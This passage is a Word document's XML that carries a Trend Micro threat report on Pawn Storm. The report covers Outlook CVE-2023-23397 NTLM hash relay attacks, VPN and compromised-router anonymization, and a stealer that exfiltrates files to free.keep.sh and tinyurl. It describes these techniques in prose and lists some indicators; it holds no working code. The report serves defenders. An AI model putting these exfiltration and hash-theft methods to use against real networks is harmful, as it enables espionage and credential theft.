        <w:t>drown out the silence, subtlety, and complexity of the initial intrusion, as well as the post-exploitation actions that might occur once Pawn Storm gets an initial foothold in victim organizations.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Based on our estimates, from approximately April 2022 until November 2023, Pawn Storm attempted to launch NTLMv2 hash relay attacks through different methods, with huge peaks in the number of targets and variations in the government departments that it targeted. Those on the receiving end of Pawn Storm's malicious spear-phishing campaigns include organizations dealing with foreign affairs, energy, defense, and transportation. The group also targeted organizations involved with labor, social welfare, finance, parenthood, and even local city councils, a central bank, court houses, and the fire department of a country's military branch.</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Are these attempts at launching Net-NTLMv2 hash relay attacks too noisy and repetitive? Or are they just Pawn Storm's cost-efficient method of automating attempts to brute-force its way into the networks of governments, the defense industry, and military forces around the world?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 think that is more of the latter. Furthermore, the constant attacks on governments, logistics, and the defense industry in several regions hide the more advanced part of the attacks, as described by the Polish ministry of defense and Microsoft in recent blog postings. Part of the group's post- exploitation activities involve the modification of folder permissions within the victim's mailbox, leading to enhanced persistence. Using the victim's email accounts, lateral movement is possible by sending additional malicious email messages from within the victim organization.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group's targets include a wide range of tools from the government, the defense industry, the energy and transportation sectors, as well as the military. According to our telemetry, the targets were in Europe, North America, South America, Asia, Africa, and the Middle East.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Target description Region Armed forces Europe, South America Central bank Middle East City council Asia, Europe, Middle East, North America, Africa Defense industry Europe , North America, South America Aerospace industry Europe Electricity authority Europe, Middle East Energy sector Europe Intellectual property authority Middle East Ministry of Agriculture Europe, South America Ministry of Energy Europe Ministry of Environment Europe Ministry of Finance Europe , South America Ministry of Foreign Affairs Europe, Middle East, Asia Ministry of the Interior Europe Ministry for Labor Europe, Asia Ministry for National Security Europe Ministry for Social Affairs Europe, Middle East Ministry of Transportation Europe Parliament Europe Postal services Europe Presidency department Europe State government North America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1. Pawn Storm targets in recent campaigns according to Trend Micro telemetry</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Pawn Storm, which has been active since at least 2004, began focusing more on operational security during the past few years, with the group's TTPs changing slowly over time.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One of the most common methods used by Pawn Storm to break into systems is brute-force credential attacks. Since 2019, the actor has been actively trying to brute-force its way into mail servers and the corporate virtual private network (VPN) services of organizations around the world.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 believe that Pawn Storm has had success with its campaigns and we assess that the threat actor has managed to breach thousands of email addresses, which we've observed are being abused to send additional waves of spear- phishing emails (most likely for information gathering, but also to be used as infrastructure for other attacks).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 help defenders learn more about the group's activities and adjust their defenses against Pawn Storm, we offer a technical analysis of some of the recent and updated techniques we have seen the group use.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Anonymization layers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To hide their tracks, Pawn Storm employs a wide range of tools, including VPN services, Tor, data center IP addresses, and compromised EdgeOS routers that are probably also used by other financially motivated cybercriminals. In addition, Pawn Storm has compromised numerous email accounts around the world, using them as a launchpad to send spear-phishing emails. Finally, the threat actor includes free services such as URL shorteners, free file hosting services, and free email services in its repertoire.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Since at least 2019, Pawn Storm has been probing Microsoft Outlook servers and corporate VPN servers across regions, most likely in an attempt to use brute-force methods to access corporate and government accounts. During that time, these probes were performed from data center computer servers that we had previously associated with Pawn Storm.</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Since 2020, more anonymizing shells were put in place (including Tor and commercial VPN networks) to continue with scanning and probing. This use of anonymization layers is also seen in the group's spear-phishing emails in recent years. Often, the spear-phishing emails were sent from compromised email accounts in the Middle East and Asia that were accessed over IMAP (Internet Message Access Protocol) from Tor or VPN exit nodes. When we combined data from the French cybersecurity agency Agence nationale de la s'ecurit'e des syst`emes d'information (ANSSI) with our own, we were able to count more than a dozen different VPN services that have been used by Pawn Storm in 2022 and 2023.</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VPN service Confidence level (ANSSI) Confidence level (Trend) AnchorFree N/A High Surfshark High N/A ExpressVPN High N/A CactusVPN High High Proton VPN High N/A Le VPN N/A High Mullvad VPN N/A High Whoer VPN N/A High Windscribe VPN N/A High PrivateVPN Medium N/A IPVanish Medium High NordVPN Medium N/A WorldVPN Low N/A PureVPN Low N/A VPNSecure Low N/A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Table 2. VPN services used by Pawn Storm, according to ANSSI and Trend data</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Pawn Storm has also been using EdgeOS routers to send spear-phishing emails, perform callbacks of CVE-2023-23397 exploits in Outlook, and proxy credential theft on credential phishing websites. Many of these EdgeOS routers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>look to have had implants, such as the Python-based Waitress and Werkzeug web server gateway interfaces, a Server Message Block (SMB) server on port 445 used for exploiting CVE-2023-23397, an open SOCKS5 proxy on port 56981, and an extra Secure Shell (SSH) server listening on non- standard high TCP ports, like 2222, 58749, and 59417.</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 do not know whether Pawn Storm itself compromised these EdgeOS routers or if it is using routers that were already compromised by a third-party actor. We have, however, observed commonalities among over a hundred EdgeOS routers that look to be compromised.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Several of these EdgeOS routers are sources of pharmaceutical and dating spam, SSH brute-force attacks, and other types of abuse. A smaller subset was also used by Pawn Storm at the same time as the cybercriminal abuse. For example, the IP address 202.175.177[.]238 - a regular source of pharmaceutical spam during the same month - had a Werkzeug implant on port 8080 that occurred in March 2023, proxying credential theft for Pawn Storm. This effectively means that Pawn Storm's use of EdgeOS routers blended cybercriminal activities, providing the group with an additional anonymization layer.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Net-NTMLv2 hash relay attack</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March 2023, the critical vulnerability CVE-2023-23397 was patched in Outlook. This flaw, which has low complexity for the attacker and does not need any user interaction, affected all versions of the Outlook app running on Windows. As described in our previous blog entry, the attack involves an email message being sent to the targeted organization with an extended Message Application Program Interface (MAPI) property with a Universal Naming Convention (UNC) path to a remote attacker-controlled SMB (via TCP 445) server. The attacker remotely sends a malicious calendar invite represented by .msg - the message format that supports reminders in Outlook - to trigger the vulnerable API endpoint PlayReminderSound using PidLidReminderFileParameter (the custom alert sound option for reminders).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When the victim connects to the attacker's SMB server, the connection to the remote server sends the user's NTLM protocol negotiation message containing the user's Net-NTLMv2 hash, which the attacker can use for authentication against other systems that support NTLM authentication. This attack is known as a hash relay attack. For this to work, the attacker must relay the negotiation message after receiving it from the victim's machine. Possible targets include Microsoft Exchange Servers from the same organization and domain. Attackers can also store these hashes to try and crack them to retrieve the clear-text password, but this process is heavily dependent on the password's complexity and length, in case of dictionary and brute-force attacks.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appears that Pawn Storm has been using this vulnerability since it was still a zero-day (which we estimate to be around April 2022). The malicious messages were sent using hacked email accounts, mostly in the Middle East and Asia, that were similar to the ones used in 2022 for the over-a-decade- old credential phishing campaigns of Pawn Storm. The only difference is that, based on our telemetry, VPN exit nodes like Cactus VPN were used for the credential phishing campaigns to connect to hacked email account using IMAP (Internet Message Access Protocol) as opposed to the malicious emails using CVE-2023-23397, where compromised EdgeOS routers were being used instead of VPN exit nodes.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These campaigns lasted at least until the end of August 2023. Starting from April 2023, Pawn Storm used more elaborate methods in its attacks. These involved scripts hosted on Mockbin (mockbin.org) being sent to the targets via email. The Mockbin URLs check for particular User-Agent values and country codes, after which it might redirect the user to a PHP script located in free web hosting domains (often ending with infinityfreeapp[.]com, the same free website service that has been abused since at least 2021 in older credential phishing campaigns of Pawn Storm).</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1. An example of a username exfiltration routine from Pawn Storm</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download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Note that Pawn Storm uses a robust filtering system to deter security researchers, as well as automated scripts, that try to determine whether a website is malicious or not.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Files uploaded to VirusTotal suggest there were other variants of these attacks, including one that had a final payload (SHA256: 52951f2d92e3d547bad86e33c1b0a8622ac391c614efa3c5d167d8a825937179) that is a PowerShell script that helps steal Net-NTLMv2 hashes. When run, the script leaves two background processes sending requests to localhost at port 8080, as Figure 2 shows. This will trigger an NTLMv2 authentication via WebDAV, which is HTTP-based.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2. Sending requests to localhost at port 8080</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download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script then creates an HTTP listener to receive the requests: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3. The HTTP listener for receiving requests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download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Next, the spawned process (client) sends a NEGOTIATE message to the listener script (server) that replies with a CHALLENGE message. During legitimate NTLM authentication, this message contains a random 8-byte number, but in this case, the attackers use a fixed sequence of bytes. The client then sends an AUTHENTICATE message to the server that forwards it to mockbin.org:</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4. Sending an AUTHENTICATE message to the server, which is forwarded to mockbin.org</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download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We ran the script with the user "alice" in an ftr.com domain, after which the following packet was exfiltrated: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lastRenderedPageBreak/>
        <w:t>Figure 5. The exfiltrated packet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download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capture was made with a Windows 10 Pro client that previously joined a Windows Server 2019 domain with its default settings. The blob matches the AUTHENTICATE_MESSAGE of the NTLM protocol, which we wrote a Kaitai Struct for. The packet contains everything needed to build a Net-NTLMv2 hash string that can be used in a dictionary attack or a relay attack.</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Pawn Storm has also been using an exploit in the WinRAR vulnerability CVE- 2023-38831 in a related hash relay attack.</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Recent credential phishing campaign</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Pawn Storm launched a credential phishing campaign against various governments in Europe from Nov. 29 to Dec. 11, 2023, using webhook[.]site URLs and Mullvad, Whoer, and IPVanish VPN IP addresses to send the emails. We can relate this campaign to some of the Net-NTLMv2 hash relay campaigns via technical indicators. For example, the same computer name was used in both campaigns. That computer name was also used to send out spear-phishing emails and craft LNK files that were used in some of the Net-NTLMv2 hash relay campaigns.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6. Pawn Storm's credential phishing website using webhook[.][site URLs in November and December 2023</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download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Information stealer without a C&amp;C server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October 2022, Pawn Storm sent spear-phishing emails to a select number of targets, including embassies and other high-profile targets. These emails included a simple and small information stealer as an attachment without a command-and-control (C&amp;C) server to reach out to.</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7. Spear-phishing email sent by Pawn Storm in October 2022 with a malicious attachment that installs a simple information stealer without a C&amp;C server</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download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Once installed on a victim's computer, the stealer is entirely on its own. The file creates an internet shortcut at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\search.urlpointing to itself. This makes the file run upon Windows startup. During regular intervals, the info stealer looks for the following files: .pdf .docx .doc .xlsx .txt .zip .xls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It then uploads the files in succession with an HTTP PUT request to a free file-sharing service, free.keep.sh.</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8. Example of the exfiltration of a text file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download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For every file sent, keep.sh replies with a URL to access the file. The file path is written to a log.txt file to prevent it from being re-uploaded.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program then sends a GET request to https://tinyurl.com to get the value from XSRF-TOKEN in the cookie set. It then sends a POST request to https://tinyurl.com/app/api/create to create a shortened URL for every file uploaded to free.keep.sh. The following JSON is sent:</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Figure 9. The sent JSON file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download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Thealias field is important in this case. This is what comes after tinyurl.com/ so the attackers can access the stolen files. The 20-second delay ensures that the aliases per victim are unique.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shortened URLs have a fixed format that is calculated from the timestamp when the shortened URL is created. This means that each day, 86,400 different shortened URLs can be created. Pawn Storm would have to brute-force these URLs to get to the actual location where the stolen information has been uploaded. This seems like a crude way of stealing information, but when such a sample is found in the wild without context, it would be difficult to attribute this piece of malware to any known intrusion set or threat actor. We can, however, attribute this information stealer (SHA256: 4f3992b9dbd1c2a64588a5bc23f1b37a12a4355688d6e1a06408ea2449c59368) to Pawn Storm with high confidence, based on the way it was delivered to the targets.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Conclusion and outlook</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Although Pawn Storm has been active for two decades, it still retains its aggressiveness and determination to break into the networks and emails of high-profile targets around the world.</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Since at least 2019, it has employed brute-force attacks (first from dedicated servers and then with additional anonymization layers such as commercial VPN services), Tor, and infrastructure that is very likely being shared with more standard cybercriminal use. Recently, Pawn Storm has been using more advanced and stealthy methods that are both loud and aggressive, which makes it difficult to determine what is happening in the victim's network post-compromise.</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appendix, we have an extensive list of indicators that can help network defenders to check whether their organization has been targeted. Although Pawn Storm makes use of shared IP addresses, such as commercial VPN services and compromised EdgeOS routers, the group tends to use the same VPN exit nodes for days and even weeks. The relatively slow changes in the TTPs of Pawn Storm can help defenders detect the initial stages of a compromise, even when the threat actor uses more advanced tactics (and even zero-day vulnerabilities) for the succeeding stages.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Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="a5"/>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indicators of compromise for this blog entry can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>Trend Micro 2024.01.31 09:11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EB1B73">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01"/>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201B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19E61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AD4DE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4E6C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E21BAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F73EA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170264"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6D23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257BE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F86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2E7067"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEE8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B27700"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21BC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853007"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DFC4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391853"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0848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C13B97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D4C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5F7153"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FD0C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6A6A28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="999C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B04471"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A554F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4469DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5768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7163AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="615A5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8AE16EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="954AA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3"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="10"/>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1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782D"/>
    <w:rsid w:val="00093949"/>
    <w:rsid w:val="001D782D"/>
    <w:rsid w:val="008A4CC5"/>
    <w:rsid w:val="00D13F5A"/>
    <w:rsid w:val="00EB1B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7EED3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{12770DE5-9BA4-4641-8552-65290FAB9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1D782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0"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001D782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D782D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D782D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="001D782D"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D782D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D782D"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-0"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D782D"/>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0">
    <w:name w:val="z-Начало формы Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="z-"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D782D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-1">
    <w:name w:val="HTML Bottom of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-2"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D782D"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="z-2">
    <w:name w:val="z-Конец формы Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="z-1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D782D"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D782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128086">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="386805934">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1798991047">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="803698252">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1761633135">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="102499231">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="5310"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1832023504">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1705860062">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2037340542">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1926453428">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:left w:val="single" w:sz="6" w:space="4" w:color="FFFFFF"/>
                <w:bottom w:val="single" w:sz="2" w:space="2" w:color="FFFFFF"/>
                <w:right w:val="single" w:sz="2" w:space="11" w:color="FFFFFF"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="165768722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970433596">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="280697587">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="120"/>
          <w:marTop w:val="72"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1870291073">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="11424484">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="442269047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1855655517">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1918703929">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="211235967">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="348066875">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
